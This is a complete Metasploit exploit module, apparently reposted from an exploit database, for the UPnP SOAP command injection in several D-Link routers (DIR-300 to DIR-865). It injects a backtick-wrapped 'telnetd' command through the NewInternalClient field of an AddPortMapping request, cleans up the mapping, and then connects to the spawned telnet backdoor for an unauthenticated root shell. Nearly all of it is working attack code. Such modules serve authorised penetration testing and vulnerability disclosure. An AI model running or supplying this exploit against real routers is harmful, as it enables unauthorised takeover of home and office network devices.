###########################

# D-Link Devices UPnP SOAP Telnetd Command Execution

###########################

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link Devices UPnP SOAP Telnetd Command Execution',
'Description' => %q{
Various D-Link Routers are vulnerable to OS command injection in the UPnP SOAP
interface. This module has been tested successfully on DIR-300, DIR-600, DIR-645,
DIR-845 and DIR-865. According to the vulnerability discoverer, more D-Link devices
may be affected.
},
'Author' =>
[
'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
'juan vazquez' # minor help with msf module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '94924' ],
[ 'BID', '61005' ],
[ 'EDB', '26664' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-020' ]
],
'DisclosureDate' => 'Jul 05 2013',
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0
))

register_options(
[
Opt::RPORT(49152) #port of UPnP SOAP webinterface
], self.class)

register_advanced_options(
[
OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
], self.class)
end

def tel_timeout
(datastore['TelnetTimeout'] || 10).to_i
end

def banner_timeout
(datastore['TelnetBannerTimeout'] || 25).to_i
end

def exploit
@new_portmapping_descr = rand_text_alpha(8)
@new_external_port = rand(65535)
@new_internal_port = rand(65535)
telnetport = rand(65535)

vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")

cmd = "telnetd -p #{telnetport}"
type = "add"
res = request(cmd, type)
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end
type = "delete"
res = request(cmd, type)
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end

print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })

if sock.nil?
fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been
spawned!!!")
end

print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
prompt = negotiate_telnet(sock)
if prompt.nil?
sock.close
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
else
print_good("#{rhost}:#{rport} - Telnet session successfully established...")
end

handler(sock)
end

def request(cmd, type)

uri = '/soap.cgi'

data_cmd = "<?xml version=\"1.0\"?>"
data_cmd << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope\"
SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
data_cmd << "<SOAP-ENV:Body>"

if type == "add"
vprint_status("#{rhost}:#{rport} - adding portmapping")

soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"

data_cmd << "<m:AddPortMapping
xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
data_cmd <<
"<NewPortMappingDescription>#{@new_portmapping_descr}</NewPortMappingDescription>"
data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
data_cmd << "<NewEnabled>1</NewEnabled>"
data_cmd << "<NewExternalPort>#{@new_external_port}</NewExternalPort>"
data_cmd << "<NewRemoteHost></NewRemoteHost>"
data_cmd << "<NewProtocol>TCP</NewProtocol>"
data_cmd << "<NewInternalPort>#{@new_internal_port}</NewInternalPort>"
data_cmd << "</m:AddPortMapping>"
else
#we should clean it up ... otherwise we are not able to exploit it multiple times
vprint_status("#{rhost}:#{rport} - deleting portmapping")
soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"

data_cmd << "<m:DeletePortMapping
xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
data_cmd <<
"<NewProtocol>TCP</NewProtocol><NewExternalPort>#{@new_external_port}</NewExternalPort><
NewRemoteHost></NewRemoteHost>"
data_cmd << "</m:DeletePortMapping>"
end

data_cmd << "</SOAP-ENV:Body>"
data_cmd << "</SOAP-ENV:Envelope>"

begin
res = send_request_cgi({
'uri' => uri,
'vars_get' => {
'service' => 'WANIPConn1'
},
'ctype' => "text/xml",
'method' => 'POST',
'headers' => {
'SOAPAction' => soapaction,
},
'data' => data_cmd
})
return res
rescue ::Rex::ConnectionError
fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
end
end

def negotiate_telnet(sock)
begin
Timeout.timeout(banner_timeout) do
while(true)
data = sock.get_once(-1, tel_timeout)
return nil if not data or data.length == 0
if data =~ /\x23\x20$/
return true
end
end
end
rescue ::Timeout::Error
return nil
end
end

end

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2013-09-17]

###########################